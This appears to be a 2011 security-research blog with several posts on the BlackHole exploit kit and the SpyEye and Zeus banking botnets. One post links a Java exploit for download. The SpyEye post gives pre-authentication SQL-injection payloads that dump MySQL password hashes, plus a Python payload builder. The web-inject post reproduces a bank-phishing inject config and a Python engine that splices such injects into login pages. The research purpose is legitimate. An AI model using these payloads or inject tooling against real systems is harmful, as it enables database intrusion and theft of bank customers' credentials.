Monday, October 17, 2011

BlackHole BEP + HP Scanner Infections

We have recently observed a large volume of email traffic spreading a fake HP scanner notification that carries non-legitimate links. The campaign is an infection process that drives traffic simply by sending a plethora of emails around the internet; harvesting email addresses is no big deal nowadays and is a walk in the park for phishers and attackers. The HP scanning email looks as presented below

The only part of this malware campaign worth a brief look is its use of Java exploits served through the BlackHole BEP.
The user is tricked into visiting hxxp://finance-motor.info/main.php, which redirects to the malicious domain hxxp://ahredret.ru/main.php. The whois record for this Russian domain shows the following
domain: AHREDRET.RU
nserver: dns1.naunet.ru.
nserver: dns2.naunet.ru.
state: REGISTERED, DELEGATED, UNVERIFIED
person: Private Person
e-mail: mxx3@yandex.ru
registrar: NAUNET-REG-RIPN
created: 2011.10.06
paid-till: 2012.10.06
source: TCI

Last updated on 2011.10.17 20:35:46 MSK/MSD


The record above shows that the domain was registered on 2011.10.06, eleven days before this analysis, and that the record was updated on the day of the analysis: a freshly registered domain that is still being actively maintained, which is consistent with an active infection process. A port scan of the host shows ports 22 and 80 open. Port 80 serves the BlackHole BEP and port 22 is used for administration over SSH, as shown below

22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 1024 bb:d1:ae:ea:db:46:97:2a:09:ca:38:cc:50:47:9c:24 (DSA)
|_1024 39:1d:f5:8c:fa:ad:9c:02:a0:bf:db:9d:2a:24:73:bb (RSA)
80/tcp open http nginx


The next step was to run the page through Wepawet, but, as expected, the server did not respond well to the tool, as presented below


Wepawet's automated HTTP request/response and detection module did not work against this server. In the end it came down to manual analysis in a suitably configured sandbox. We preferred generic settings that give the malware room to run its full infection chain while still capturing the information we need. On careful manual testing, the server handed us the exploit prototype as follows


The field.jar contains the following set of Java files



We have already performed analysis on this kind of exploit, which is used effectively by BlackHole (Java is what I like the most for spreading infections).

Fetch the code - http://www.secniche.org/sample_exploits/hp_scan_exploit.rar

Enjoy !

Thursday, September 29, 2011

Virus Bulletin - Browser Malware Taxonomy




Journal : http://www.virusbtn.com/virusbulletin/archive/2011/06/vb201106-browser-malware-taxonomy

We will be releasing more papers from Virus Bulletin once the three-month period from the date of publication has passed. It's all about honouring the contract.

Wednesday, August 31, 2011

Blasting SpyEye C&C - SQL Injection Wins

The world has changed dramatically with the evolution of malware, and the same classes of vulnerability that plague ordinary web applications, SQL injection among them, can be used to compromise a malware-driven server. Some time ago we talked about Blind SQL Injection in SpyEye version 1.0, where we presented the vulnerability in the SpyEye code; since then we did not get the time to present it as a complete case study. In this post we walk step by step through compromising the SpyEye database server. Other attacks are possible too, such as Local File Inclusion (LFI) to read the configuration credentials, but we stick to SQL injection to show how far a single injection can be taken in seizing control of the malware server.

The vulnerability affects the latest version of SpyEye (1.3), in "frmcp0/frm_findrep_sub2.php?id=". The good part is that this SQL injection works pre-authentication: no login to the control panel is needed.

Injection 1: Version Disclosure - http://spyeye_domain.com/frmcp0/frm_findrep_sub2.php?id=-999999%20union%20all%20select%200x31,concat(0x7e,0x27,version(),0x27,0x7e),0x33,0x34,0x35,0x36,0x37--+




You can see that the injected value surfaces in the page title; the ~'...'~ markers (0x7e,0x27) wrapped around it are there so the value is easy to pick out of the response. This confirms that our payload is being executed by the database. Following the same pattern, let's perform some further injections as presented below

Injection 2: Database Verification - http://spyeye_domain.com/frmcp0/frm_findrep_sub2.php?id=-999999%20union%20all%20select%200x31,concat(0x7e,0x27,database(),0x27,0x7e),0x33,0x34,0x35,0x36,0x37--+




Injection 3: Information Schema Disclosure - http://spyeye_domain.com/frmcp0/frm_findrep_sub2.php?id=-999999 union all select 0x31,concat(0x7e,0x27,group_concat(column_name),0x27,0x7e),0x33,0x34,0x35,0x36,0x37 from `information_schema`.columns where table_schema=0x6d7973716c and table_name=0x75736572--+


The disclosed column list of mysql.user (0x6d7973716c and 0x75736572 are the hex-encoded literals 'mysql' and 'user', used so the payload needs no quote characters) is as follows

Host,User,Password,Select_priv,Insert_priv,Update_priv,Delete_priv,
Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,File_priv,
Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_priv,Super_priv,
Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_slave_priv,
Repl_client_priv,Create_view_priv,Show_view_priv,Create_routine_priv,
Alter_routine_priv,Create_user_priv,ssl_type,ssl_cipher,x509_issuer,
x509_subject,max_questions,max_updates,max_connections,max_user_connections


Injection 4: Pwning MySQL Database - http://spyeye_domain.com/frmcp0/frm_findrep_sub2.php?id=-999999 union all select 0x31,concat(0x7e,0x27,user.User,0x3a,user.Host,0x3a,user.Password,0x27,0x7e),0x33,0x34,0x35,0x36,0x37 from `mysql`.user limit 0,1--+
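As an added example (written for this page, not part of the original post and not SpyEye's code), the following Python encodes the pattern the four injections share: a UNION with the seven columns of the original query, the expression of interest in the second column (the one echoed into the page title), wrapped in the 0x7e,0x27 markers so the value can be pulled back out of the HTML, and hex-encoded string literals so no quote character is needed. The column count, the marker convention and the path are taken from the injections above. The HTTP responses at the bottom are constructed samples, not captured output, and the script only builds URLs and parses responses; it sends nothing.

```python
import re
from urllib.parse import quote

# Shape of the vulnerable query, taken from the injections above: the SELECT
# behind frm_findrep_sub2.php?id= has seven columns, and the second one is
# echoed into the page <title>.
COLUMNS = 7
RESULT_COLUMN = 2

def hexlit(s: str) -> str:
    """MySQL hex literal for a string (0x6d7973716c == 'mysql'), so the
    payload contains no quote characters that a filter might strip."""
    return "0x" + s.encode("utf-8").hex()

def build_payload(expr: str, from_clause: str = "") -> str:
    """UNION payload placing expr in RESULT_COLUMN, wrapped in ~'...'~ markers
    (0x7e,0x27) so the value can be located in the HTML afterwards."""
    cols = []
    for n in range(1, COLUMNS + 1):
        if n == RESULT_COLUMN:
            cols.append(f"concat(0x7e,0x27,{expr},0x27,0x7e)")
        else:
            cols.append(hexlit(str(n)))          # 0x31, 0x33, ... as filler
    payload = "-999999 union all select " + ",".join(cols)
    if from_clause:
        payload += " " + from_clause
    return payload + "--+"                       # comment out the rest; '+' is a space

def build_url(base: str, expr: str, from_clause: str = "") -> str:
    """Encode the payload for the id= parameter; SQL punctuation stays intact."""
    return base + "?id=" + quote(build_payload(expr, from_clause), safe="(),=+-`*")

def column_names_payload(schema: str, table: str) -> str:
    """Injection 3 generalised: list the columns of any schema.table."""
    where = (f"from `information_schema`.columns where "
             f"table_schema={hexlit(schema)} and table_name={hexlit(table)}")
    return build_payload("group_concat(column_name)", where)

def user_row_payload(offset: int) -> str:
    """Injection 4 generalised: one mysql.user row per request, walking LIMIT."""
    return build_payload("user.User,0x3a,user.Host,0x3a,user.Password",
                         f"from `mysql`.user limit {offset},1")

def extract_result(html: str):
    """Pull the value between the ~' and '~ markers out of the response."""
    m = re.search(r"~'(.*?)'~", html, re.S)
    return m.group(1) if m else None

def parse_user_row(result: str) -> dict:
    """Split the User:Host:Password triple built by user_row_payload."""
    user, host, pw_hash = result.split(":", 2)
    return {"user": user, "host": host, "password_hash": pw_hash}

# Constructed responses standing in for the panel's HTML (not captured data).
SAMPLE_VERSION_RESPONSE = "<html><head><title>~'5.1.41-3ubuntu12'~</title></head><body></body></html>"
SAMPLE_USER_RESPONSE = ("<html><head><title>~'root:localhost:"
                        "*0123456789ABCDEF0123456789ABCDEF01234567'~</title></head></html>")

if __name__ == "__main__":
    print(build_url("http://spyeye_domain.com/frmcp0/frm_findrep_sub2.php", "version()"))
    print(extract_result(SAMPLE_VERSION_RESPONSE))
    print(parse_user_row(extract_result(SAMPLE_USER_RESPONSE)))
```

The root cause on the panel side is that the id parameter is concatenated into the query as-is; a prepared statement with a bound integer parameter would close the hole, but one does not expect the SpyEye authors to ship that patch.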




So this discussion has demonstrated that security vulnerabilities in malware infrastructure can be fruitful in hunting back malware. We will be giving a detailed talk on Hunting Web Malware at OWASP AppSec USA and Hacker Halted this year.

OWASP AppSec USA - http://www.appsecusa.org/talks.html#goodhacker

Hacker Halted : http://www.hackerhalted.com/2011/Presenters.aspx


Stay tuned.

Sunday, August 7, 2011

SpyEye - RDP BackConnect Plugin and Total Commander

Well, malware has many facets, and there is no doubt about that. In this post we raise a point about the SpyEye RDP back-connect plugin and how it works. During our talk at Hack In The Box (HITB) Amsterdam we presented the details of the SpyEye botnet and its ability to work with modular plugins. The RDP plugin in SpyEye works on the same principles as the FTP and SOCKS back-connect plugins.

Generally, the bot is compiled with a set of plugins. The RDP plugin starts an RDP server on the infected client machine and creates a hidden user account there; the bot then connects back from the victim machine to the attacker's back-connect (BC) server, so that the attacker can reach the victim's desktop from outside, and the hidden account is used for those sessions. The plugin thereby lets the remote command server execute commands on the victim machine over RDP.

In addition, the SpyEye bot downloads the portable version of Total Commander from the internet and executes it in memory on the fly. The beauty of this plugin is that no system restart is required when Total Commander is downloaded and run on the victim machine.



The plugin requires the following environment variables, which supply the information needed for plugin execution

%IP_OF_BC_SERVER%
%PORT_OF_BC_SERVER%
%MAGIC_CODE%
%WINDOWS_LOGIN%
%WINDOWS_PASSWORD%
%URL_TO_PORTABLE_TCMD%


The connection to the bot can be made with the standard Windows tool mstsc.exe (Remote Desktop Connection). It has also been observed that this plugin supports only x86 operating systems and not x64; hopefully an x64 version will be released in time.

Tuesday, August 2, 2011

Virus Bulletin - SpyEye Exploitation Tactics

As a follow-up to our article on the SpyEye malware infection framework, we are discussing the SpyEye bot and the tactics it uses for stealing information from victim machines.

Fetch the paper from here : http://www.virusbtn.com/virusbulletin/archive/2011/08/vb201108-spyeye

Right now it is available to subscribers only.

Sunday, July 3, 2011

(SpyEye & Zeus) Web Injects - Parameters

We are in the process of analysing a large set of web injects logs and real client-side code. During analysis we found that third-generation botnets (Zeus and SpyEye) use an explicit technique for injecting rogue content into the web pages of bank websites. The content is injected inline, but the plugin that does this follows a defined set of parameters and a fixed procedure. In this post we talk about the parameters used to perform web injects successfully. The plugin communicates with the bot installed on the client side, and a specific series of steps is followed, as part of the hierarchical infection, to trick the browser.

The installed bot understands the following parameters

1. set_url [Target to inject]
The set_url parameter names the website targeted for web injects, as a URL pattern in which * is a wildcard. The bot matches every HTTP request against it so that injection is done only on the pages that match. The trailing flags (GP in the example below) select the request methods on which the rule fires: G for GET and P for POST.

2. data_before / data_end
This block sets the anchor for the injection. data_before holds a fragment of the legitimate page (again with * as a wildcard), the bot searches the server's response for it, and the injected content is placed immediately after the match. Choosing the anchor carefully is what keeps the resulting HTML well formed, without broken tags.

3. data_inject | data_end
This block is the main killing part, holding the real web inject: the rogue JavaScript/HTML that is inserted into the legitimate bank website or any other proprietary financial web site.

4. data_after | data_end
The last block holds the closing anchor. When it is non-empty, the original content between the data_before match and the data_after match is replaced by the inject; when it is left empty, as in the examples below, the inject is simply inserted after the data_before match. Again the purpose is to render the HTML successfully, inline with the main page of the website.

Several of these blocks under one set_url can be used to inject code at more than one place in the target page.

One real injected configuration is presented below (HTML angle brackets appear as square brackets in the listing)
set_url https://target_website/login.html* GP
data_before
name="password"*[/tr]
data_end
data_inject
[TD][FONT class=userinfo] What is your favourite meal or restaurant? [/FONT][/TD]
[TD align=left width=200][INPUT tabIndex=1 name=q1] [/TD][/TR]
[TD][FONT class=userinfo] The name of a memorable place to you? [/FONT][/TD]
[TD align=left width=200][INPUT tabIndex=1 name=q2] [/TD][/TR]
[TD][FONT class=userinfo] Your favourite film of all time? [/FONT][/TD]
[TD align=left width=200][INPUT tabIndex=1 name=q3] [/TD][/TR]
[TD][FONT class=userinfo] Your favourite book of all time? [/FONT][/TD]
[TD align=left width=200][INPUT tabIndex=1 name=q4] [/TD][/TR]
[TD][FONT class=userinfo] Your favourite teacher or subject? [/FONT][/TD]
[TD align=left width=200][INPUT tabIndex=1 name=q5] [/TD][/TR]
[TD][FONT class=userinfo] Your favourite TV star or show? [/FONT][/TD]
[TD align=left width=200][INPUT tabIndex=1 name=q6] [/TD][/TR]

data_end
data_after
data_end


data_before
var cusID*;
data_end
data_inject


if (document.forms[0].q1.value.length < 2) {
alert('Please, fill answers to all questions');
document.forms[0].q1.focus();
document.forms[0].loginButton.disabled = false;
submitActioned = false;
return false;
}
if (document.forms[0].q2.value.length < 2) {
alert('Please, fill answers to all questions');
document.forms[0].q2.focus();
document.forms[0].loginButton.disabled = false;
submitActioned = false;
return false;
}
if (document.forms[0].q3.value.length < 2) {
alert('Please, fill answers to all questions');
document.forms[0].q3.focus();
document.forms[0].loginButton.disabled = false;
submitActioned = false;
return false;
}
if (document.forms[0].q4.value.length < 2) {
alert('Please, fill answers to all questions');
document.forms[0].q4.focus();
document.forms[0].loginButton.disabled = false;
submitActioned = false;
return false;
}
if (document.forms[0].q5.value.length < 2) {
alert('Please, fill answers to all questions');
document.forms[0].q5.focus();
document.forms[0].loginButton.disabled = false;
submitActioned = false;
return false;
}
if (document.forms[0].q6.value.length < 2) {
alert('Please, fill answers to all questions');
document.forms[0].q6.focus();
document.forms[0].loginButton.disabled = false;
submitActioned = false;
return false;
}

data_end
data_after
data_end


These examples clarify how exactly the web injects code works and how it is rendered into the web pages by the installed bot.
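To make the parameter semantics above concrete, here is an added example, written for this page and not code from Zeus or SpyEye: a small Python parser for the set_url / data_before / data_inject / data_after format and a function that rewrites a page the way the bot does before the browser renders it. The sample config and the sample login page are constructed for illustration, with the HTML written with ordinary angle brackets; the assumptions are that * is a wildcard in both set_url and the anchors, that G and P mean GET and POST, and that a non-empty data_after replaces the content between the two anchors.

```python
import re
from dataclasses import dataclass, field
from typing import List

# Constructed sample config in the set_url / data_before / data_inject /
# data_after format discussed above (HTML with real angle brackets).
# It is a cut-down illustration, not a config captured from a bot.
SAMPLE_INJECTS = """\
set_url https://target_website/login.html* GP
data_before
name="password"*</tr>
data_end
data_inject
<tr><td class=userinfo>What is your favourite meal or restaurant?</td>
<td><input tabindex=1 name=q1></td></tr>
data_end
data_after
data_end
"""

# Constructed stand-in for the bank's login page as returned by the server.
SAMPLE_PAGE = (
    '<form action="/login" method="post">\n'
    '<tr><td>Password</td><td><input type="password" name="password"></td></tr>\n'
    '<tr><td><input type="submit" name="loginButton"></td></tr>\n'
    '</form>'
)

@dataclass
class Inject:
    before: str   # anchor pattern searched in the response ('*' is a wildcard)
    inject: str   # content placed after the anchor
    after: str    # closing anchor; content between the two anchors is replaced

@dataclass
class Rule:
    url_pattern: str
    flags: str                      # e.g. "GP": apply on GET and POST requests
    injects: List[Inject] = field(default_factory=list)

def parse_webinjects(text: str) -> List[Rule]:
    """Parse a webinjects config into Rule objects (one per set_url)."""
    rules: List[Rule] = []
    current = None
    block = {}
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        line = lines[i].strip()
        if line.startswith("set_url"):
            parts = line.split(None, 2)
            current = Rule(url_pattern=parts[1], flags=parts[2] if len(parts) > 2 else "")
            rules.append(current)
            block = {}
            i += 1
        elif line in ("data_before", "data_inject", "data_after"):
            body = []
            i += 1
            while i < len(lines) and lines[i].strip() != "data_end":
                body.append(lines[i])
                i += 1
            i += 1  # consume data_end
            block[line] = "\n".join(body).strip()
            # data_after closes one before/inject/after triple
            if line == "data_after" and current is not None:
                current.injects.append(Inject(block.get("data_before", ""),
                                              block.get("data_inject", ""),
                                              block.get("data_after", "")))
                block = {}
        else:
            i += 1
    return rules

def wildcard_to_regex(pattern: str):
    """Translate the config's '*' wildcard into a non-greedy regex."""
    return re.compile(".*?".join(re.escape(p) for p in pattern.split("*")), re.S)

def url_matches(rule: Rule, url: str, method: str) -> bool:
    """Does this rule fire for the request? method is 'G' (GET) or 'P' (POST)."""
    if method not in rule.flags:
        return False
    return wildcard_to_regex(rule.url_pattern).fullmatch(url) is not None

def apply_injects(rule: Rule, html: str) -> str:
    """Rewrite the server response the way the bot does before rendering."""
    out = html
    for inj in rule.injects:
        m_before = wildcard_to_regex(inj.before).search(out)
        if not m_before:
            continue                       # anchor absent: page left untouched
        start = end = m_before.end()
        if inj.after:
            m_after = wildcard_to_regex(inj.after).search(out, start)
            if not m_after:
                continue
            end = m_after.start()
        out = out[:start] + inj.inject + out[end:]
    return out

if __name__ == "__main__":
    rule = parse_webinjects(SAMPLE_INJECTS)[0]
    if url_matches(rule, "https://target_website/login.html", "G"):
        print(apply_injects(rule, SAMPLE_PAGE))
```

Run stand-alone, the script prints the login page with the extra "security question" row spliced in right after the password row, which is exactly what the victim's browser renders; the server never sees the modified HTML, which is why server-side integrity checks on the page do not catch this class of attack.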

SpyEye Malware Infection Framework - VB


We have just released the first part of our research on SpyEye in Virus Bulletin magazine. The next part of the research will be coming soon.

VB - SpyEye Malware Infection Framework